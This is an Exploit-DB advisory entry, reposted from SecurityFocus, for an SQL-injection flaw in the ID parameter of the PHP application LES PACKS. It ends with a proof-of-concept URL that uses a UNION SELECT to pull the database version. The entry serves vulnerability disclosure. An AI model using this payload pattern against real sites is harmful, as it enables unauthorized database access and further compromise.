LES PACKS - 'ID' SQL Injection

EDB-ID:

34935

CVE:

N/A


Platform:

PHP

Published:

2010-10-27

source: http://www.securityfocus.com/bid/44457/info

LES PACKS is prone to an SQL-injection vulnerability.

An attacker can exploit this SQL-injection issue to carry out unauthorized actions on the underlying database, which may compromise the application and aid in further attacks. 

http://www.example.com/index.php?Page=articles&ID=-1+union+select+1,2,@@version,4,5,6,7,8,9,10,11,12,13,14,15